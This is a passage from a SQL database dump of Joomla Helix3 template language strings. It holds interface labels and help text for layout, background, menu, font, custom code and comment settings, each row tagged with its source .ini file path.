Row','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3805,'HELIX_NONE','None','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3806,'HELIX_COLUMN_SETTINGS','Column Settings3','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3807,'HELIX_ADD_COLUMNS','Add Columns','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3808,'HELIX_SETTINGS','Settings','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3809,'HELIX_REMOVE','Remove','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3810,'HELIX_SECTION_TITLE','Section Title','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3811,'HELIX_SECTION_TITLE_DESC','Section title will be replaced by section ID in the front-end. e.g. If you set section title as \"<strong>Main Body</strong>\" then you will get output as <section id=\"main-body\"></section> in the frontend.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3812,'HELIX_SECTION_BACKGROUND_COLOR','Background Color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3813,'HELIX_SECTION_BACKGROUND_COLOR_DESC','Background color will be applied in this section. Leave this field blank if this section does not require a background color.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3814,'HELIX_SECTION_TEXT_COLOR','Text Color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3815,'HELIX_SECTION_TEXT_COLOR_DESC','Text color will be applied in this section. Leave this field blank if this section does not require a text color.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3816,'HELIX_SECTION_BACKGROUND_IMAGE','Background Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3817,'HELIX_SECTION_BACKGROUND_IMAGE_DESC','Set background image for this section. Always set a background-color to be used if the image is unavailable.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3818,'HELIX_BG_REPEAT','Background Repeat','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3819,'HELIX_BG_REPEAT_DESC','Set how a background image will be repeated. By default, a background-image is no repeated, and the image is placed at the top left corner.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3820,'HELIX_BG_REPEAT_NO','No Repeat','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3821,'HELIX_BG_REPEAT_ALL','Repeat All','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3822,'HELIX_BG_REPEAT_HORIZ','Repeat Horizontally','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3823,'HELIX_BG_REPEAT_VERTI','Repeat Vertically','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3824,'HELIX_BG_REPEAT_INHERIT','Inherit','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3825,'HELIX_BG_SIZE','Background Size','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3826,'HELIX_BG_SIZE_DESC','Set the size of the background image. Default vaule is cover - is means scale the background image to be as large as possible so that the background area is completely covered by the background image.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3827,'HELIX_BG_COVER','Cover','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3828,'HELIX_BG_CONTAIN','Contain','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3829,'HELIX_BG_INHERIT','Inherit','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3830,'HELIX_BG_ATTACHMENT','Background Attachment','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3831,'HELIX_BG_ATTACHMENT_DESC','Set whether a background image attachment is fixed or scrolls.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3832,'HELIX_BG_ATTACHMENT_FIXED','Fixed','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3833,'HELIX_BG_ATTACHMENT_SCROLL','Scroll','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3834,'HELIX_BG_ATTACHMENT_INHERIT','Inherit','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3835,'HELIX_BG_POSITION','Background Position','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3836,'HELIX_BG_POSITION_DESC','Set the starting position of a background image.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3837,'HELIX_BG_POSITION_LEFT_TOP','Left Top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3838,'HELIX_BG_POSITION_LEFT_CENTER','Left Center','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3839,'HELIX_BG_POSITION_LEFT_BOTTOM','Left Bottom','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3840,'HELIX_BG_POSITION_CENTER_TOP','Center Top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3841,'HELIX_BG_POSITION_CENTER_CENTER','Center Center','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3842,'HELIX_BG_POSITION_CENTER_BOTTOM','Center Bottom','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3843,'HELIX_BG_POSITION_RIGHT_TOP','Right Top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3844,'HELIX_BG_POSITION_RIGHT_CENTER','Right Center','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3845,'HELIX_BG_POSITION_RIGHT_BOTTOM','Right Bottom','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3846,'HELIX_LINK_COLOR','Link Color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3847,'HELIX_LINK_COLOR_DESC','Leave this field blank if link color is not required.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3848,'HELIX_LINK_HOVER_COLOR','Link Hover Color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3849,'HELIX_LINK_HOVER_COLOR_DESC','Leave this field blank if link hover color is not required.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3850,'HELIX_HIDDEN_MOBILE','Hide on Mobile','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3851,'HELIX_HIDDEN_MOBILE_DESC','Enable this option to hide this section for mobile devices.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3852,'HELIX_HIDDEN_TABLET','Hide on Tablet','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3853,'HELIX_HIDDEN_TABLET_DESC','Enable this option to hide this section for Tablets.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3854,'HELIX_HIDDEN_DESKTOP','Hide on Desktop','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3855,'HELIX_HIDDEN_DESKTOP_DESC','Enable this option to hide this section for larger display like desktops or laptops.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3856,'HELIX_PADDING','Padding','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3857,'HELIX_PADDING_DESC','Set all the padding area a the space between the content of the element and its border (Top Right Bottom Left). Negative values are not allowed.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3858,'HELIX_MARGIN','Margin','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3859,'HELIX_MARGIN_DESC','Set the margin for all four sides (Top Right Bottom Left). Negative values are also allowed.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3860,'HELIX_ROW_FULL_WIDTH','Fluid Width','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3861,'HELIX_ROW_FULL_WIDTH_DESC','Enable this option to make this section fluid. Fluid row will help you to publish full width content like google map.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3862,'HELIX_CUSTOM_CLASS','Custom CSS Class','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3863,'HELIX_CUSTOM_CLASS_DESC','If you wish to style particular content element differently, then use this field to add a class name and then refer to it in your css file.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3864,'HELIX_COMPONENT','Make Component Area','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3865,'HELIX_COMPONENT_DESC','Enable this option to make this column as a Component area. If you already selected component area for another column then unselect that one first then select this one. <br><strong>Note:</strong> Joomla message section will also be loaded inside this column.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3866,'HELIX_MODULE_POSITION','Module Position','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3867,'HELIX_MODULE_POSITION_DESC','Select any suitable module position from the list. Do not set one module position to multiple position.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3868,'HELIX_TABLET_LAYOUT','Tablet Layout','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3869,'HELIX_TABLET_LAYOUT_DESC','Set the class of this column for tablets.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3870,'HELIX_MOBILE_LAYOUT','Mobile Layout','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3871,'HELIX_MOBILE_LAYOUT_DESC','Set the class of this column for mobile devices','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3872,'COM_TEMPLATES_MENU_FIELDSET_LABEL','<i class=\'fa fa-list-ul\'></i>Menu','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3873,'HELIX_MEGAMENU','Mega Menu','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3874,'HELIX_MEGAMENU_SELECT','Select Menu','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3875,'HELIX_MEGAMENU_SELECT_DESC','Select menu to display as Main menu','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3876,'HELIX_MENU_TYPE','Menu Type','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3877,'HELIX_MENU_TYPE_DESC','Select a suitable menu type from the list. You need to add module to offcanvas position from the Module Manager.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3878,'HELIX_MEGAMENU_OFFCANVAS','Mega Menu & Off Canvas','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3879,'HELIX_OFFCANVAS','Off Canvas','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3880,'HELIX_MEGAMENU_DROPDOWN_WIDTH','Dropdown Width','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3881,'HELIX_MEGAMENU_DROPDOWN_WIDTH_DESC','Input width of mega menu dropdown.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3882,'HELIX_MENU_DROPDOWN_ANIMATION','Dropdown Animation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3883,'HELIX_MENU_DROPDOWN_ANIMATION_DESC','Select dropdown menu animation from the list.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3884,'HELIX_NO_ANIMATION','No Animation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3885,'HELIX_FADE_ANIMATION','Fade','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3886,'HELIX_ZOOM_ANIMATION','Zoom','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3887,'HELIX_FADE_UP_ANIMATION','Fade In Up','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3888,'HELIX_ELASTIC_ANIMATION','Elastic','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3889,'HELIX_SLIDEDOWN_ANIMATION','Slide Down','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3890,'HELIX_DROPIN_ANIMATION','Drop IN','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3891,'HELIX_TWIST_ANIMATION','Twist','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3892,'HELIX_MENU_OFFCANVAS_ANIMATION','Off canvas Animation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3893,'HELIX_MENU_OFFCANVAS_ANIMATION_DESC','Select a animation for off canvas menu','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3894,'HELIX_OFFANIMATION_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3895,'HELIX_OFFANIMATION_FULLSCREEN','FullScreen','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3896,'HELIX_OFFANIMATION_FULLSCREEN_FROM_TOP','FullScreen From Top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3897,'HELIX_OFFANIMATION_SLIDE_RIGHT','Slide Right','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3898,'HELIX_OFFANIMATION_DARK_PLUS','Dark Plus','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3899,'HELIX_NO_MODULE_OFFCANVAS','Please publish modules in <strong>offcanvas</strong> position.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3900,'HELIX_MEGA_MENU_BG_COLOR','Dropdown background color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3901,'HELIX_MEGA_MENU_BG_COLOR_DESC','Select a mega menu dropdown background color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3902,'HELIX_MEGA_MENU_TEXT_COLOR','Dropdown Text Color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3903,'HELIX_MEGA_MENU_TEXT_COLOR_DESC','Select a mega menu dropdown text color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3904,'COM_TEMPLATES_TYPOGRAPHY_FIELDSET_LABEL','<i class=\'fa fa-font\'></i>Typography','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3905,'HELIX_FONT_FAMILY','Font Family','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3906,'HELIX_FONT_WEIGHT_STYLE','Font Weight & Style','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3907,'HELIX_FONT_SUBSET','Font Subset','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3908,'HELIX_FONT_SIZE','Font Size','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3909,'HELIX_GFONT_API','Google Font API','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3910,'HELIX_GFONT_API_DESC','Get your API key from the link given above and click the <strong>Save</strong> button after inserting the API Key.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3911,'HELIX_GOOGLE_FONTS_LIST','Google Fonts List','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3912,'HELIX_GOOGLE_FONTS_LIST_DESC','You may require <strong>Google Fonts API Key</strong> to update the font list. Get your API Key from here: <a href=\'https://developers.google.com/fonts/docs/developer_api\' target=\'_blank\'>https://developers.google.com/fonts/docs/developer_api</a>','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3913,'HELIX_UPDATE_FONTS_LIST','Update Fonts List','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3914,'HELIX_UPDATE_FONTS_LIST_DESC','It allows you to refresh the list of available Google fonts. If there are any new ones, this button allows you to quickly update fonts with just one click, and they will be automatically added in to Helix 3 Framework.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3915,'HELIX_UPDATE_FONTS_CLICK','One Click update','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3916,'HELIX_BODY_FONT','Body Font','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3917,'HELIX_BODY_FONT_DESC','This google font will be applied on <body> tag.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3918,'HELIX_ENABLE_FONT','Enable','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3919,'HELIX_ENABLE_FONT_DESC','Enable google for this CSS Selector.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3920,'HELIX_SELECT_FONT','Select Font','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3921,'HELIX_SELECT_FONT_DESC','Set the default font.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3922,'HEADING1_FONT','Heading1 Font','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3923,'HEADING1_FONT_DESC','This google font will be applied on <h1> tag.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3924,'HEADING2_FONT','Heading2 Font','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3925,'HEADING2_FONT_DESC','This google font will be applied on <h2> tag.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3926,'HEADING3_FONT','Heading3 Font','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3927,'HEADING3_FONT_DESC','This google font will be applied on <h3> tag.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3928,'HEADING4_FONT','Heading4 Font','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3929,'HEADING4_FONT_DESC','This google font will be applied on <h4> tag.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3930,'HEADING5_FONT','Heading5 Font','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3931,'HEADING5_FONT_DESC','This google font will be applied on <h5> tag.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3932,'HEADING6_FONT','Heading6 Font','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3933,'HEADING6_FONT_DESC','This google font will be applied on <h6> tag.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3934,'NAVIGATION_FONT','Navigation Font','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3935,'NAVIGATION_FONT_DESC','This google font will be applied on main navigation.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3936,'CUSTOM_FONT','Custom Font','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3937,'CUSTOM_FONT_DESC','Apply this google font to any custom CSS selector.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3938,'HELIX_FONT_CUSTOM_SELECTORS','CSS Selectors','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3939,'HELIX_FONT_CUSTOM_SELECTORS_DESC','Add custom CSS selectors. Separated by comma.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3940,'COM_TEMPLATES_CUSTOM_CODE_FIELDSET_LABEL','<i class=\'fa fa-code\'></i>Custom Code','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3941,'HELIX_CUSTOM_CODE','Custom Code','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3942,'HELIX_BEFORE_HEAD','Before </head>','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3943,'HELIX_BEFORE_HEAD_DESC','Any code you place here will appear in the head section of every page of your site. This is useful when you need to add verification code, javascript or css links to all pages.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3944,'HELIX_BEFORE_BODY','Before </body>','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3945,'HELIX_BEFORE_BODY_DESC','Any code you place here will appear in bottom of body section of all pages of your site. This is useful if you need to input a tracking code for a state counter such as Google Analytics or Clicky.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3946,'HELIX_CUSTOM_CSS','Custom CSS','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3947,'HELIX_CUSTOM_CSS_DESC','You can use custom CSS to add your own styles or overwrite default CSS of a template or extension. This option is good small changes in the stylesheets. For more extensive changes (more then 10 lines of code) we suggest to use the custom.css file.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3948,'HELIX_CUSTOM_JS','Custom Javascript','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3949,'HELIX_CUSTOM_JS_DESC','You can add custom javascripts code. It loads your custom Javascript file after all other Javascript files (except special hard coded occasions), allowing you to be the last one who will affect your website.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3950,'COM_TEMPLATES_ADVANCE_FIELDSET_LABEL','<i class=\'fa fa-cog\'></i>Advanced','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3951,'HELIX_CACHE_SETTINGS','Compression Settings','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3952,'HELIX_CSS_COMPRESS','Compress CSS','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3953,'HELIX_CSS_COMPRESS_DESC','','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3954,'HELIX_JS_COMPRESS','Compress Javascripts','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3955,'HELIX_EXCLUDE_JS','Exclude Javascript','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3956,'HELIX_EXCLUDE_JS_DESC','Enter the names of javascript files seperated by comma that you don\'t want to compress. e.g. jquery.min.js, main.js','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3957,'HELIX_LESS','Less','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3958,'HELIX_ENABLE_LESS','Compile LESS to CSS','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3959,'HELIX_ENABLE_LESS_DESC','Helix 3 is developed with LESS. When customize your site, we suggest you to work with LESS files. All your changes in the LESS files will be compiled into the final CSS files. It will override previus changes.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3960,'HELIX_IMPORT_EXPORT','Export/Import Template Settings','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3961,'HELIX_IMPORT_EXPORT_FIELD','Settings Import/Export','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3962,'HELIX_SETTINGS_EXPORT','Export Settings','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3963,'HELIX_SETTINGS_IMPORT','Import Settings','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3964,'COM_TEMPLATES_BLOG_FIELDSET_LABEL','<i class=\'fa fa-thumb-tack\'></i>Blog','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3965,'HELIX_COMMENTS','Comments Settings','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3966,'HELIX_COMMENTING_ENGINE','Commenting Engine','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3967,'HELIX_COMMENTING_ENGINE_DESC','Choose which commenting engine will be used for blog post. Select disable in order to hide comments from joomla article.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3968,'HELIX_DISQUSS','Disqus','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3969,'HELIX_INTENSEDEBATE','IntenseDebate','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3970,'HELIX_FB','Facebook','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3971,'HELIX_DISABLED','Disabled','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3972,'HELIX_DISQUS_SUBDOMAIN','Disqus Username/Subdomain','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3973,'HELIX_DISQUS_SUBDOMAIN_DESC','Set the subdomain that you registered at disqus.com','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3974,'HELIX_DISQUS_DEV_MODE','Disqus Developer Mode','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3975,'HELIX_DISQUS_DEV_MODE_DESC','Enable this option if you are testing behind a firewall or proxy, and not yet on your live site.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3976,'HELIX_INTENSEDEBATE_ACC','IntenseDebate Account','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3977,'HELIX_INTENSEDEBATE_ACC_DESC','Set the intenseDebate account','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3978,'HELIX_FB_ID','Facebook Application ID','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3979,'HELIX_FB_ID_DESC','Set the Facebook Application ID, visit https://developers.facebook.com/apps to get application id','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3980,'HELIX_FB_COMMENTS_WIDTH','Comments Width','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3981,'HELIX_FB_COMMENTS_WIDTH_DESC','Width of the comments plugin in pixel, eg. 500. Note: Facebook doesn\'t provide a Facebook Comment code for responsive (fluid grid) websites. It uses only static width for comments box.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3982,'HELIX_FB_COMMENTS_PER_PAGE','Comments Per Page','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3983,'HELIX_FB_COMMENTS_PER_PAGE_DESC','Set the number of comments to displayed per page','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3984,'HELIX_COMMENTS_COUNT','Comments Count','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3985,'HELIX_COMMENTS_COUNT_DESC','Show comments count on blog view or frontpage','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3986,'HELIX_SOCIAL_SHARE','Social Share','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3987,'HELIX_ENABLE_SOCIAL_SHARE','Enable Social Share','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3988,'HELIX_ENABLE_SOCIAL_SHARE_DESC','Enable this option to social share buttons in joomla blog list or single article.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3989,'HELIX_POST_FORMAT','Post Format','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3990,'HELIX_SHOW_POST_FORMAT','Show Icon','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3991,'HELIX_SHOW_POST_FORMAT_DESC','Enable this to show post format icon.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3992,'HELIX3_ARTICLE_RATING','Rating','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3993,'HELIX_IMAGE_SIZES','Image 